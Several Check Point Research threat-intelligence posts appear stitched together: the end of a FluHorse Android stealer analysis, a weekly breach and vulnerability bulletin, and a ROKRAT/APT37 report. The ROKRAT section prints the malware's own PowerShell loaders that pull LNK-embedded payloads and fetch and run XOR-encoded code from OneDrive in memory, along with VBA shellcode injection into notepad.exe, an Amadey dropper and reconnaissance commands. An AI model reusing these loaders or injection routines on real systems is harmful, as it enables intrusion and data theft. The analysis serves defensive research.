Therefore, the function sub_70FD611C0C is used for leaking SMS messages to the C&C server.

The functions sub_70FD61EBC4 and sub_70FD61EECC look very similar to the already analyzed sub_70FD611C0C except for the kind of exfiltrated data and the server path. These functions use the paths “/addcontent” and “/addcontent2”, respectively, and are used to exfiltrate the victim’s credentials and pay card information.

There are no traces of server communication in DEX code, so we can assume all communication is located in the Flutter part of the application. After analyzing all the functions related to the C&C server communication, we can describe the network protocol.

C&C communication

C&C protocol intends to only send data from the compromised device to the server. There are no commands to send in the opposite direction i.e. from the server to the compromised device. HTTPS is used to transfer data, and there are several endpoints used.

This is the description of every endpoint we encountered in the analyzed samples:

Web variants of decoys that are used for Dating malicious applications use a very similar protocol. This is an example of exfiltrating credit card data:

URL: https://jp.yelove.xyz/addcontent2
METHOD: POST
BODY: {"cardNumber":"1234253456345","name":"sfsdfgfde dg sdg","expiryDate":"11/27","cvvCode":"150"}

The only difference is the body format: the Web version uses JSON instead of the “name=value” format.

Contribution summary

This is a summary of our open-source contribution to the flutter-re-demo project:

1. Added parsing of some previously unsupported constructions for accessing Dart objects.
2. Added saving key information during dynamic analysis and using this information in IDA scripts.
3. One field for the unknown Dart object struct is set to the offset so that it can bring more references to Dart objects.

Conclusion

Idealists invent new technologies hoping for the progress of humankind. Realists adapt these inventions to day-to-day needs. Evil minds abuse them in often unforeseen and unpredictable ways to make the most for themselves.

This timeless truth got an unexpected implementation in abusing modern development frameworks by Android malicious developers. Such frameworks can be used as a double-edged sword as we described above. Malware operators pursued a direct approach to stealing victims’ sensitive data without distractions to other components.

The technical implementation of these malicious samples consists of several layers. As the functional part is relatively simple, we can conclude that the malware developers did not put much effort into the programming, instead relying on Flutter as a developing platform. The developers’ main focus is on the GUI. This approach allowed them to create dangerous and mostly undetected malicious applications. One of the benefits of using Flutter is that its hard-to-analyze nature renders many contemporary security solutions worthless.

We traced FluHorse activity back to May 2022. Our analysis shows that these campaigns remain an ongoing threat as new infrastructure nodes and malicious applications appear each month.

As the human factor remains an important factor in malware attacks, Check Point Research recommends the following suggestions for mobile device users:

Check Point’s Harmony Mobile prevents malware from infiltrating mobile devices by detecting and blocking the download of malicious apps in real-time. Harmony Mobile’s unique network security infrastructure – On-device Network Protection – allows you to stay ahead of emerging threats by extending Check Point’s industry-leading network security technologies to mobile devices.

Relevant Check Point protections:

• Stealer.Android.FluHorse.TC.*
• FluHorse.TC.*

IOCs

Samples

Domains

Online resources

Open-source projects

1. https://github.com/Guardsquare/flutter-re-demo // flutter-re-demo – Open-source project for analysis of Flutter-based applications
2. https://github.com/ptswarm/reFlutter // reFlutter – Open-source project for analysis of Flutter-based applications
3. https://github.com/frida // Frida – Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers

Technical analysis articles

1. https://blog.tst.sh/reverse-engineering-flutter-apps-part-1 // Reverse engineering Flutter apps (Part 1)
2. https://www.guardsquare.com/blog/current-state-and-future-of-reversing-flutter-apps // The Current State & Future of Reversing Flutter Apps

Contribution

https://github.com/Guardsquare/flutter-re-demo/pull/4 // Our contribution to flutter-re-demo

The post Eastern Asian Android Assault – FluHorse appeared first on Check Point Research.

For the latest discoveries in cyber research for the week of 1st May, please download our Threat_Intelligence Bulletin

TOP ATTACKS AND BREACHES

• A threat actor was able to generate some mail keys of American Telecom giant AT&T, and used it to take control of AT&T customers’ email addresses. Victims report that cryptocurrency accounts connected to their AT&T emails were drained, suggesting a financial motivation for the attackers.
• Microsoft warns of a recent wave in exploitation of CVE-2023-27350, a critical-severity remote code execution vulnerability in PaperCut Application servers. According to reports, the vulnerability is being utilized by threat actors to deliver the Cl0P and LockBit ransomware variants. PaperCut has released a patch addressing the vulnerability.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats (Ransomware.Wins.Clop; Ransomware.Win.Clop; Ransomware_Linux_Clop, Ransomware.Win.LockBit; Ransomware.Wins.Lockbit)

• American cold storage and transportation company Americold has been forced to halt inbound and outbound shipping due to a cyber-attack. The company estimates that it will only be able to return to operations during the upcoming week.
• Information of 100,000 patients at the Canadian Queensway Carleton Hospital may have leaked, after a 3^rd party vendor supplying communications services to the hospital had been breached. According to the hospital’s statement, the information leaked includes both personal identifying information and sensitive medical history.
• Lowell city, Massachusetts, has been impacted by a cyber-attack. According to a statement by the city manager, while phones, emails and other city systems have been shut down as a consequence of the city’s response to the attack, no sensitive data has been exfiltrated. In another cyber-attack against an American municipality, the South Carolina county of Spartanburg has been hit with a ransomware attack, disrupting the county’s IT and phone systems.
• Hacktivist groups have targeted Israel in the past week as the country was marking its independence day. In one attack, the Iran affiliated group Sharp Boys leaked a 200,000-entry database of students’ personal information breached Israeli school and college network Atid. In another attack, the group Anonymous Sudan has caused denial-of-service to multiple Israeli government, media and corporate websites.

VULNERABILITIES AND PATCHES

• VMware, cloud computing and virtualization company, has released an advisory addressing multiple vulnerabilities in VMware Workstation and VMware Fusion. The most significant vulnerability, marked CVE-2023-20869, is of critical severity, and could allow remote code execution on the host running a vulnerable version of the virtual machine.
• Code project hosting platform GitHub has patched its product to cover five security vulnerabilities, one of which allowed arbitrary code execution. According to GitHub, the vulnerabilities were reported by security researchers, and have not been observed in the wild prior to the patches’ release.
• US CISA warns of multiple vulnerabilities affecting Illumina’s Universal Copy Service, a medical DNA sample scanner. Successful exploitation could allow attackers full remote access to the devices to potentially alter the results of DNA samples.
• Researchers have discovered CVE-2023-29552, a new vulnerability in the network discovery protocol SLP. The vulnerability potentially allows denial of service attacks against routers by sending specific requests. The threat is deemed to be especially significant due to the high amplification factor of the denial-of-service attack, which can go above 2200 on certain routers.

THREAT INTELLIGENCE REPORTS

• Check Point Research reveals new findings related to Educated Manticore, an activity cluster with strong overlap with Phosphorus, an Iranian-aligned threat actor operating in the Middle East and North America. Educated Manticore adopted recent trends and started using ISO images and possibly other archive files to initiate infection chains

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (APT.Wins.APT35.ta)

• Check Point Research has published its threat report for Q1 2023. According to the report, an increased amount of threats has been observed every week in comparison to Q1 2022, with organizations in the Education and Research sector seeing the highest increase in attacks. Additionally, organizations in Asia and Africa have also become increasingly targeted in 2023 as opposed to previous years.
• A campaign targeting Chinese NGO members by the Chinese APT group Evasive Panda has been investigated by security researchers. The threat group most likely used Tencent QQ, a popular Chinese social media and chat app, to deliver a backdoor to specific victims.

Check Point Harmony Endpoint and Threat Emulation provide protection against this threat (Infostealer.Win.PasswordStealer.A, Infostealer.Win.Generic.A)

The post 1st May – Threat Intelligence Report appeared first on Check Point Research.

Key findings

• Check Point Research (CPR) continues to track the evolution of ROKRAT and its delivery methods.
• ROKRAT has not changed significantly over the years, but its deployment methods have evolved, now utilizing archives containing LNK files that initiate multi-stage infection chains. This is another representation of a major trend in the threat landscape, where APTs and cybercriminals alike attempt to overcome the blocking of macros from untrusted sources. The first sample we will discuss below was first discovered in July 2022, the same month that Microsoft began enforcing this new rule.
• The lures used as part of the ROKRAT infections are largely focused on South Korean foreign and domestic affairs. Most of those lures are in Korean, suggesting the targets are Korean-speaking individuals.
• Our findings suggest that various multi-stage infection chains used to eventually load ROKRAT were utilized in other attacks, leading to the deployment of additional tools affiliated with the same actor. Those tools include another custom backdoor, GOLDBACKDOOR, and the commodity malware Amadey.

Introduction

From the many reports on APT37 in recent months, to Mandiant’s announcement on APT43, a lot of attention is currently focused on North Korean threat actors – and with good reason. North Korea has a long history of attacking its southern neighbor, especially by means of cyber warfare which continues today. In this article, we describe a cluster of observed activity that deploys ROKRAT, a tool previously attributed to a North Korean threat actor commonly referred to as APT37, Inky Squid, RedEyes, Reaper or ScarCruft.

In previous years, ROKRAT infection chains usually involved a malicious Hangul Word Processor (HWP, a popular document format in South Korea) document with an exploit, or a Microsoft Word document with macros. While some ROKRAT samples still use these techniques, we have observed a shift to delivering ROKRAT with LNK files disguised as legitimate documents. This shift is not exclusive to ROKRAT but represents a larger trend that became very popular in 2022. In July of that year, Microsoft began blocking macros in Office applications by default in an effort to minimize the spread of malware, and the first malware sample we discuss was discovered in the same month.

In our report, we discuss various infection chains and lures used by APT37 in their recent attacks, and the resulting payloads of ROKRAT and Amadey. Finally, we dive deeply into a technical analysis of ROKRAT.

While we were in the final stages of preparing this blogpost, another report containing a technical analysis of one of the ROKRAT campaigns was published. While it overlaps with our findings to some extent, we believe that our report provides important information about additional campaigns by APT37, as well as a deep analysis of the ROKRAT malware.

Background

First reported by Talos in April 2017, ROKRAT (also known as DOGCALL) has been consistently attributed to APT37. Typically, this tool was used to target government sectors in South Korea as well as journalists, activists, and North Korean defectors. According to the initial report, one of the ROKRAT samples utilized Twitter as its Command and Control (C&C) infrastructure, while the other relied on Yandex and Mediafire. The latter sample more closely resembles how ROKRAT operates today, relying on cloud file storage services as a C&C mechanism.

Originally supporting only Windows, over the years ROKRAT has adapted to other platforms, with macOS and Android versions discovered in the wild. The macOS version, also known as CloudMensis, was first described by ESET in July 2022. Although Android versions of ROKRAT have existed for a long time, InterLab and S2W both introduced a newer version of ROKRAT on Android, known as RambleOn (Cumulus). All of this demonstrates that this malware is still being actively developed and distributed.

Many of the tools attributed to APT37 are custom-written tools like ROKRAT, including (but not limited to) the recently reported M2RAT, Konni RAT, Chinotto, and GOLDBACKDOOR. However, the actors also use commodity malware such as Amadey. Using commodity malware makes it more difficult to attribute the attack to a specific group, as it’s widely available and anyone can acquire it.

As documented in recent publications, the threat actors have been active lately. In February, AhnLab reported a new RAT named Map2RAT or M2RAT for short. This RAT utilizes steganography tricks by hiding executables inside JPEG files to evade detection. In March, Sekoia and ZScaler both published accounts of APT37’s use of phishing sites and PowerShell backdoors, the latter of which led to the deployment of another implant named Chinotto.

Lures and Infection Chains

Over the past four months, we observed multiple infection chains leading to ROKRAT deployment. In most cases, an LNK file initiates the infection, although in a few a DOC file was used for the same purpose (the method in previous ROKRAT attacks). During our analysis of the ROKRAT infection chain, we came across a similar chain leading to the deployment of Amadey, a commercial RAT sold in underground forums. Although the nature of the attacks is different, we believe all of those were crafted by the same actors.

Decoy LNK Infection Chains

In April 2022, Stairwell published a detailed analysis of GOLDBACKDOOR, a malware utilized in a targeted attack against South Korean journalists. Stairwell provided a thorough analysis of an infection chain that utilizes large LNK files running PowerShell, leading to the execution of the newly discovered malware while dropping a decoy document. This technique is a unique implementation of a publicly available tool called EmbedExeLnk.

Although first linked to GOLDBACKDOOR, analysis of recent lures tied to APT37 suggests this technique has become a prominent method used to deliver another tool associated with the same actor, namely ROKRAT. The implementation of ROKRAT and GOLDBACKDOOR loading mechanisms are so similar that differentiating between the two is only possible upon retrieving the payload.

Over the last few months, we were able to identify multiple lures utilizing this unique implementation delivered in ZIP and ISO archives. Only some of these lures were confirmed to lead to ROKRAT deployment. All of the lures used the theme of South Korean domestic and foreign affairs.

July 2022 – National Assembly Committees

The earliest indication of the above-mentioned infection chain was found in a ZIP file named (0722)상임위원회 및 상설특별위원회 위원 명단(최종).zip ((0722) Standing Committee and Standing Special Committee Member List (final).zip). This ZIP file contains an LNK with the same name and looks very similar to the LNK loader that was used for GOLDBACKDOOR.

In this case, a decoy HWP document is dropped and opened. The document contains information about committees in the National Assembly, the South Korean parliament. Based on the timestamp of the ZIP archive, it appears that the document became publicly available on the National Assembly’s website and was weaponized within a single day. Unfortunately, we were not able to get the end payload in this infection chain, though it is highly likely it was either GOLDBACKDOOR or ROKRAT.

January 2023 – Projects in Libya

At the beginning of February 2023, we came across another new sample of ROKRAT. This time, the actors used a ZIP archive, named projects in Libya.zip, which contains several stolen documents. In the malicious archive, there were three benign files called MFZ Executive Summary Korea.pdf, Proposed MOU GTE Korea.docx, and Proposed MOU GTE Korea.pdf. The fourth file was a suspiciously large LNK, approximately 42.5 MB, masquerading as a PDF file named Pipelines Profile (Elfeel- Sharara-Mellitah + Wafa - Mellitah).pdf. Unlike all of the other lures we saw, this one was in English.

All the documents in this archive are connected to the Libyan Oil & Gas industry. The three benign documents are about a project involving a Libyan oil company called Geotech Energy and a South Korean consultant company called Tundrabiz. The decoy document that is opened after clicking the malicious LNK shows the profiling of an oil pipeline from 2005 by Enppi, an international contractor that specializes in projects in the oil and gas industries.

April 2023 – North Korea Diplomacy

At the beginning of April, we saw a similar infection chain from an ISO file that led to ROKRAT. The sample contained two malicious LNKs inside named 북 외교관 선발파견 및 해외공관.lnk (Selection and Dispatch of North Korean Diplomats and Overseas Missions.lnk) and 북한외교정책결정과정.lnk (North Korea foreign policy decision-making process.lnk). Both LNKs contain and drop decoy HWP files, which is a common document format in South Korea and is widely used by North Korean threat actors to distribute malware. The files are named 230401.hwp and 230402.hwp, respectively. These names likely indicate the dates April 1 and April 2, 2023, just a few days before the ISO archive was discovered. Both decoy documents contain articles regarding diplomacy and policy decisions of South Korea toward North Korea.

April 2023 – Korean Association for Public Administration

On April 19, another pair of LNKs were discovered. This time, there was no archive file; the LNKs were uploaded separately to VirusTotal and were not given meaningful names. However, based on the pattern we observed, they were probably named according to the PDF file they both contain: 2023년도 4월 29일 세미나.pdf (April 29, 2023 Seminar.pdf). This decoy PDF file details a seminar that it claims will happen on April 29, 2023, at the Korean Association for Public Administration, and includes a Zoom link and itinerary.

Even though the two LNKs dropped the same document and script, one file was 10 MB and the other nearly 50 MB, due to different amounts of padding inside the LNK files. Unfortunately, at the time of analysis, the payload hosted on OneDrive had already been taken down, so we are unsure of the final payload. However, we believe that it was probably ROKRAT or GOLDBACKDOOR.

LNK Infection Chain Analysis

All of the LNKs discussed above lead to nearly the same infection chain. An example of the infection is depicted below, as demonstrated in the “Projects in Libya” archive:

Clicking the malicious LNK file triggers the execution of a PowerShell, and initiates the following infection chain:

1. The PowerShell extracts a document file from the LNK, drops it to the disk, and then opens it. This file is a decoy to trick users into thinking they simply opened a normal PDF or HWP file.
2. The PowerShell extracts a BAT script from the LNK, drops it to the disk, and executes it.
   $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\admin\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0002A8F60E} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 03568692 -ReadCount 03568692; $pdfPath = 'C:\Users\admin\AppData\Local\Temp\230130.pdf'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 003388)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 03571940 -ReadCount 03571940; $exePath = 'C:\Users\admin\AppData\Local\Temp\230130.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 03568692)) -Encoding Byte; & $exePath;

3. The BAT script executes a new PowerShell instance that downloads a payload from OneDrive, decodes it by taking the first byte of the payload as a key, and XORs it with the remainder of the payload.
4. The resulting payload is reflectively injected into PowerShell, causing it to run as a new thread.
5. The shellcode decodes the ROKRAT portion of the payload with a four-byte XOR key and executes it.

[Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072)
$aa='[DllImport("kernel32.dll")]public static extern IntPtr GlobalAlloc(uint b,uint c);'
$b=Add-Type -MemberDefinition $aa -Name "AAA"  -PassThru
$abab = '[DllImport("kernel32.dll")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);'
$aab=Add-Type -MemberDefinition $abab -Name "AAB" -PassThru
$c = New-Object System.Net.WebClient
$d="https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL3UvcyFBalFOTHZFRV9DVU9iUFdnLXhPZG8xRXFYckU_ZT1BM1QwV2Q/root/content"
$bb='[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);'
$ccc=Add-Type -MemberDefinition $bb -Name "BBB" -PassThru
$ddd='[DllImport("kernel32.dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);'
$fff=Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru
$e=112

do {
    try {
        $c.Headers["user-agent"] = "connnecting..."
        $xmpw4=$c.DownloadData($d)
        $x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100)
        $old = 0
        $aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old)
        for ($h = 1; $h -lt $xmpw4.Length; $h++)
        {   [System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[0]) ) }
        try {   throw 1 }
        catch {
            $handle=$ccc::CreateThread(0,0,$x0,0,0,0)
            $fff::WaitForSingleObject($handle, 500*1000) }
        $e=222 }
    catch   {
        sleep 11
        $e=112 }
} while($e -eq 112)

Classic ROKRAT Infection Chain

While adopting new behavior to keep up with the shifting threat landscape, ROKRAT operators still stick to some old habits. In parallel to the newly identified method described above, ROKRAT is still deployed using malicious Word documents.

In December 2022, a malicious Word document named 사례비_지급의뢰서.doc (Case fee_Payment request.doc) was submitted to VirusTotal. The document itself contains a short form to enter personal and banking information. However, closer inspection of the document reveals references to the Ministry of Unification, a ministry in the South Korean government that is responsible for guiding policy with North Korea and dealing with North Korean defectors, with the ultimate goal of reuniting the two countries.

Once the user opens the malicious document and allows the macro to execute, the following infection chain is triggered:

1. The macro checks and ensures it has access to the Visual Basic project by setting the AccessVBOM registry key to load additional code.
2. The macro decodes a new VBA script, writes it to a new module in the macro, and then executes it. This is done without dropping any of the code to the disk.
3. The second VBA script runs notepad.exe and injects shellcode into it.
4. The shellcode runs inside notepad.exe and reaches out to OneDrive to download the ROKRAT payload and execute it in memory.

src_str = Array(&H55, &H8B, &HEC, &H83, &HEC, &H2C, &H50, &HE8, &H4, <truncated>...
    #If Win64 Then
        Dim FSO As Object
        Set FSO = CreateObject("Scripting.FileSystemObject")
        Dim windowsDir As String
        windowsDir = FSO.GetSpecialFolder(0)
        windowsDir = windowsDir & "\SysWOW64\notepad.exe"
        ReturnValue = CreateProcessA(0, windowsDir, 0, 0, False, 0, 0, 0, start, proc)
    #Else
        ReturnValue = CreateProcessA(0, "notepad.exe", 0, 0, False, 0, 0, 0, start, proc)
    #End If
    PID = proc.dwProcessID
    If PID Then hTargetProcHandle = OpenProcess(PROCESS_ALL_ACCESS, False, PID) Else Exit Sub
    dwCodeLen = &H800
    shellAddr = VirtualAllocEx(hTargetProcHandle, ByVal 0, dwCodeLen, &H3000, PAGE_EXECUTE_READWRITE)
    hGlobalMemory = GlobalAlloc(GHND, UBound(src_str))    
    For i = LBound(src_str) To UBound(src_str)
        bValue = src_str(i)
        RtlMoveMemory hGlobalMemory + i, bValue, 1
    Next i
    Dim resultWriteProcess
    resultWriteProcess = WriteProcessMemory(hTargetProcHandle, shellAddr, hGlobalMemory, UBound(src_str) + 1, ret)
    hThread = CreateRemoteThread(hTargetProcHandle, ByVal 0, 0, shellAddr, 0, 0, 0)

The infection chain described here is extremely similar to what MalwareBytes reported in January 2021, which also deployed ROKRAT by injecting shellcode into notepad.exe and loading the RAT in memory. However, the samples described in the MalwareBytes research had compilation dates from 2019, whereas the new ROKRAT sample we discovered appears to have been compiled on December 21, 2022, only six days before the document was submitted to VirusTotal.

Additionally, there is another document recently discovered in April 2023 that appears to be part of the same infection chain, only this time the target process for injection is mspaint.exe. The document references a few subjects such as Kim Jong-Un’s potential successor and North Korea’s nuclear weapon capabilities. Unfortunately, at the time of our analysis, the URL was no longer replying to the request to download the payload. However, it is highly likely that this document was also intended to deliver ROKRAT.

The Amadey Connection

At the beginning of November 2022, a file called securityMail.zip was submitted to VirusTotal. This ZIP contained two LNKs which were both suspiciously large at just under 5 MB. The implementation of PowerShell commands within the two LNKs is unique and overlaps only with ROKRAT and GOLDBACKDOOR LNK infections. This specific infection chain, however, ends up deploying Amadey, a commodity malware available for sale on cybercrime forums. Amadey was linked in the past to Konni, another cluster of activity that aligns with APT37.

1. A PowerShell command extracts a decoy HTML file from the LNK and drops it to disk, in a similar manner to ROKRAT infection chains:

$dirPath = Get-Location;$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472484} | Select-Object -ExpandProperty FullName;if($lnkpath.length -eq 0) {$dirPath = \"$env:temp\";$lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x0000472484} | Select-Object -ExpandProperty FullName;};$pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00090300 -ReadCount 00090300;$pdfPath = \"$env:temp\securityMail_1031.html\"; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004386)) -Encoding Byte; & $pdfPath;$exeFile = gc $lnkpath -Encoding Byte -TotalCount 04662404 -ReadCount 04662404;$exePath=\"$env:public\11702.zip\";sc $exePath ([byte[]]($exeFile | select -Skip 00090300)) -Encoding Byte;$shell = new-object -com shell.application;$zip = $shell.Namespace($exePath);if($zip.items().count -gt 0){$executemodule = $env:public + '\' + $zip.items().item(0).name;$shell.Namespace($env:public).CopyHere($zip.items().item(0), 1044) | out-null;   remove-item -path $exePath -force;$batPath=\"$env:public\27868.bat\";$cmdline=\"rundll32.exe `\"$executemodule`\",Run`r`ndel /f /q %0\";sc $batPath $cmdline;start-process -filepath $batPath -windowstyle hidden;}

2. This PowerShell also extracts a ZIP archive from the LNK, which contains a DLL. The DLL is then dropped to disk as mfc100.dll.
3. The PowerShell finally extracts a BAT script from the LNK as well, dropping it to disk and executing it.
4. The BAT script runs the DLL with rundll32.exe and deletes itself.

rundll32.exe "C:\Users\Public\mfc100.dll",Run
del /f /q %0

An initial analysis of the DLL file revealed that it is packed with Themida, a commercial code protection solution. After analyzing a memory dump of its execution, we were able to confirm that this was in fact Amadey. The decoy HTML file contains a fake login page for Kakao Bank, a popular bank in South Korea. Further analysis of the HTML revealed that it is not used for password phishing, but to hide the threat actors’ intentions.

ROKRAT Technical Analysis

ROKRAT is just one of the many custom tools used by this threat actor, but is definitely versatile and powerful. ROKRAT primarily focuses on running additional payloads and extensive data exfiltration. It relies on cloud infrastructure for C&C functions, including DropBox, pCloud, Yandex Cloud, and OneDrive. ROKRAT also collects information about the machine to prevent further infection of unintended victims.

While it’s no secret that ROKRAT has not significantly changed in the last few years, this can be attributed to its slick use of in-memory execution, disguising C&C communication as potentially legitimate cloud communication, and additional layers of encryption to hinder network analysis and evade network signatures. As a result, there are not a lot of recent published articles about ROKRAT.

General Malware Structure

Most samples of ROKRAT have a very simple WinMain function. All of the samples analyzed so far contain a data collection functionality (CollectMachineData, as seen in Figure 11 below) which is executed before the execution of the Main RAT thread (MainRATThread). This thread initializes the RAT and runs a loop to try and get commands from the C&C, and then parses and executes them.

There are two additional functionalities embedded into the WinMain function that we only observed in a subset of the samples. The first checks if the RAT is able to write to the TEMP directory (CheckTemp, as seen in Figure 11 below). The second one creates a thread (KillCertainProcessesThread) to kill certain processes linked to previous infection vectors that exploited vulnerabilities in Hancom Office.

Victim Fingerprinting and Evasions

One of the first functions that ROKRAT calls when it executes is designed to collect data about the infected machine. In this phase of infection, this is likely to help the attackers distinguish if this is a desired target or not, and then act accordingly.
In this function (and many others), ROKRAT uses encrypted strings to prevent some of the techniques used from being visible to static analysis. The information collected here includes whether the program is running on WOW64 (indicating 32-bit applications running on 64-bit windows), the version of vmtoolsd.exe (VMWare Tools Daemon, if installed), SMBIOS data from the registry, and the system BIOS version from the registry as well.

The RAT also collects the username, machine name, and the full path to the executable file where the RAT is executing. The latter is important because the infection chain usually involves injecting a ROKRAT PE file into an existing process’s memory. In other words, this allows the attackers to see if ROKRAT is executing in the expected process, such as powershell.exe or notepad.exe. Finally, the function checks to see if the executable has permission to create a file for writing under C:\Windows.

While a lot of the target’s data is collected in the function mentioned above, there is another data collection function that runs in the context of the main RAT thread before ROKRAT starts accepting commands. This second function check calls the IsDebuggerPresent API, storing the result as a character (0 or 1). In addition, it calls a function to grab a screenshot of the machine.

The data collection carried out in the main thread will be executed, sending the collected each time ROKRAT attempts to get commands.

In this same function, some samples also check if there is a running process named 360Tray.exe, a process that is part of an antivirus software called 360 Total Security. The result is stored in a global Boolean variable and is accessed in a separate function used to execute shellcode payloads. Interestingly, if the process was found, ROKRAT doubles the timeout period it waits for the shellcode to finish running from 24 seconds to 48 seconds. If the shellcode runs past the timeout period and 360Tray.exe was not previously detected, ROKRAT attempts to terminate the shellcode thread.

As previously mentioned, some ROKRAT samples execute a thread called KillCertainProcessesThread. This thread kills two processes, gbb.exe and gswin32c.exe, which are responsible for parsing postscript data in Hancom Office. In the past, ROKRAT samples have come from malicious HWP documents that exploit these processes to gain code execution. Most likely, this is code left over from trying to clean any traces of exploitation from previous campaigns.

Instead of using hardcoded or encrypted strings for these process names, ROKRAT instead contains a simple hashing algorithm that determines a process name based on an integer value. It works in the following way:

def calculate_hash(process_name):
    hash_value = 5381  # Initial value
    for current_char in process_name.upper():
        hash_value = ord(current_char) + 33 * hash_value
    return hash_value & 0xFFFFFFFF  # Return as 32-bit integer

C&C Communication

In each of the ROKRAT samples we analyzed, the malware configuration contained an ID number representing the cloud infrastructure, and the API token to use it. The ID number can have the following values to correspond to different cloud providers, as well as a test mode that allows the RAT to communicate with the local machine:

• 1 – Local machine (no cloud)
• 3 – Dropbox
• 4 – pCloud
• 5 – Yandex

Further analysis indicates that there are usually two C&C configurations, one used as the primary infrastructure and the second as a backup. In the latest samples we discovered, the primary C&C was pCloud and the secondary was Yandex Cloud.

ROKRAT starts with initializing the token and then gets the folder content from the C&C to make sure it has access and the token is valid:

The names for the files that ROKRAT uses are generated based on GetTickCount API and random values from the rand API with the time of execution as a seed.

ROKRAT uploads a file to the server that contains the following information about the victim machine:

• Hardcoded value 0xBAADFEDE – Used later in the C&C communication
• IsDebuggerPresent value
• Screenshot image the malware previously saved to the following path: %TEMP%\<16 hex digits>.tmp
• Processes data – pid:<PID>,name:<process name>,path:<file name> for every working process
• Tick Count
• XOR keys – Used for decrypting commands and payloads from the C&C
• Generated filenames – Used later for downloading and executing payloads in certain commands
• IsWow64Process flag
• Windows Version
• Computer Name
• Username
• Machine Type – Obtained by querying SMBiosData registry value under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mssmbios\Data
• VMware tools version data
• System BIOS version

To further hide its tracks, ROKRAT labels the data collected about the victim’s machine as MP3:

First, the data is XORed with a random four-byte key. For this reason, the data begins with a hardcoded four-byte value 0xBAADFEDE. As the attackers know the hardcoded value, they can derive the XOR key by XORing the first four bytes of the XORed data with 0xBAADFEDE to retrieve the key. The XORed data is then encrypted with AES-CBC. Finally, the AES key is encrypted with a hardcoded RSA public key to ensure that the payload can only be decrypted with the RSA private key.

Despite the fact that C&C communication is already encrypted in HTTPS traffic, ROKRAT takes it a step further by encrypting data uploaded to the C&C with AES. When the malware initializes, it generates two random 16-byte values, which serve as a basis for the AES keys used to encrypt commands and payloads. The malware also comes with a hardcoded 16-byte value, which is then XORed against the two randomized values. The result is two AES keys, one that is used to encrypt and decrypt commands, and one that is used to encrypt and decrypt payloads.

ROKRAT Commands

Each command is identified by a single character. Some of the commands take arguments, and they are supplied just after the command ID character. After the correct command is identified, the code parses the arguments according to the type of command. The following table lists the commands we discovered in ROKRAT, together with their expected arguments and actions:

Upon receiving the cleanup command (d), ROKRAT runs the following commands to delete persistence mechanisms not initially used by the malware. They might be related to some post-infection activity.

• reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v OfficeBootPower /f & reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v OfficeBootPower /f & del c:\programdata\30
• del "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\*.VBS" "%appdata%\*.CMD" "%appdata%\*.BAT" "%appdata%\01" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\.lnk" "%allusersprofile%\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk" /F /Q

Upon receiving commands 1–4, ROKRAT creates a file called out.txt, which contains information about the system:

tasklist>>"%temp%\out.txt" & 
echo ======================AppDataStartup>>"%temp%\out.txt" & 
dir /a "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup">>"%temp%\out.txt" & 
echo ======================AllUsersProfileStartup>>"%temp%\out.txt" & 
dir /a "%allusersprofile%\Microsoft\Windows\Start Menu\Programs\Startup">>"%temp%\out.txt" & 
echo ======================SystemInfo>>"%temp%\out.txt" & 
systeminfo>>"%temp%\out.txt" & 
echo ======================RoutePrint>>"%temp%\out.txt" & 
route print>>"%temp%\out.txt" & 
echo ======================IpConfig>>"%temp%\out.txt" & 
ipconfig /all>>"%temp%\out.txt" & 
echo ======================ARP>>"%temp%\out.txt" & 
arp -a>>"%temp%\out.txt" & 
echo ======================Recent>>"%temp%\out.txt" & 
dir /a "%appdata%\Microsoft\Windows\Recent">>"%temp%\out.txt" & 
echo ======================WMIC>>"%temp%\out.txt" & 
wmic startup >> "%temp%\out.txt" & 
echo ======================LocalAppData>>"%temp%\out.txt" & 
dir /a "%localappdata%">>"%temp%\out.txt" & 
echo ======================AllUsersProfile>>"%temp%\out.txt" & 
dir /a "%allusersprofile%">>"%temp%\out.txt”

Conclusion

In this report, we describe new activity by the notorious North Korean threat actor APT37. We discuss several different infection chains, most of which result in a ROKRAT payload. These infection chains show that since 2022, this group has stopped heavily relying on malicious documents to deliver malware and instead begun to hide payloads inside oversized LNK files. This method can trigger an equally effective infection chain by a simple double click, one that is more reliable than n-day exploits or the Office macros which require additional clicks to launch.

Although we found that ROKRAT has not changed a lot recently, we see that the loaders being used to deploy it have indeed changed, shifting to the LNK method. In fact, this is the first time we saw ROKRAT delivered with an LNK infection chain, similar to the one used to deploy GOLDBACKDOOR. It is important to note that this does not mean APT37 no longer uses malicious documents, as we found evidence of such use as recently as April 2023.

